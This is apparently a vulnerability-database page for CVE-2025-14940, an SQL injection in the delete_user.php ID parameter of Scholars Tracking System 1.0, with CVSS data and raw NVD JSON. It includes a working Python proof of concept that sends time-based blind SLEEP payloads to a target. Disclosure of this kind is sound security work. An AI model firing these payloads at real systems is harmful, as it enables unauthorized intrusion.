Security Vulnerability Report
中文
CVE-2025-14940 CVSS 7.3 HIGH

CVE-2025-14940

Published: 2025-12-19 04:16:01
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A vulnerability was determined in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /admin/delete_user.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:scholars_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE
Scholars Tracking System 1.0 (code-projects)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-14940 PoC - SQL Injection in Scholars Tracking System 1.0 # Target: /admin/delete_user.php # Type: Time-based blind SQL injection via ID parameter def exploit_sql_injection(target_url, user_id): """ Time-based blind SQL injection PoC Tests if the ID parameter is vulnerable to SQL injection """ # Normal request (should succeed) normal_url = f"{target_url}/admin/delete_user.php?id={user_id}" # SQL injection payloads for testing payloads = [ f"{user_id}' AND SLEEP(5)-- -", # MySQL time-based blind f"{user_id}' AND (SELECT * FROM (SELECT SLEEP(5))a)-- -", f"{user_id}' OR SLEEP(5)-- -", ] print(f"[*] Testing target: {target_url}") print(f"[*] Normal request: {normal_url}") # Test normal request try: response = requests.get(normal_url, timeout=10) print(f"[+] Normal request status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False # Test injection payloads for i, payload in enumerate(payloads, 1): injection_url = f"{target_url}/admin/delete_user.php?id={payload}" print(f"\n[*] Testing payload {i}: {payload}") try: import time start_time = time.time() response = requests.get(injection_url, timeout=30) elapsed_time = time.time() - start_time print(f"[+] Response time: {elapsed_time:.2f}s") if elapsed_time >= 5: print(f"[!] VULNERABLE! Time-based SQL injection confirmed") print(f"[!] Payload {i} caused {elapsed_time:.2f}s delay") return True except requests.exceptions.Timeout: print("[!] VULNERABLE! Request timed out (possible successful injection)") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("\n[-] No obvious SQL injection detected with test payloads") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-14940.py <target_url> <user_id>") print("Example: python cve-2025-14940.py http://localhost:8080 1") sys.exit(1) target = sys.argv[1].rstrip('/') uid = sys.argv[2] exploit_sql_injection(target, uid)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14940", "sourceIdentifier": "[email protected]", "published": "2025-12-19T04:16:00.960", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Scholars Tracking System 1.0. The affected element is an unknown function of the file /admin/delete_user.php. This manipulation of the argument ID causes sql injection. It is possible to initiate the attack remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:scholars_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "181B8F36-C4C5-4F67-AC1F-79162D790489"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/gx922/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337520", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337520", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716120", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.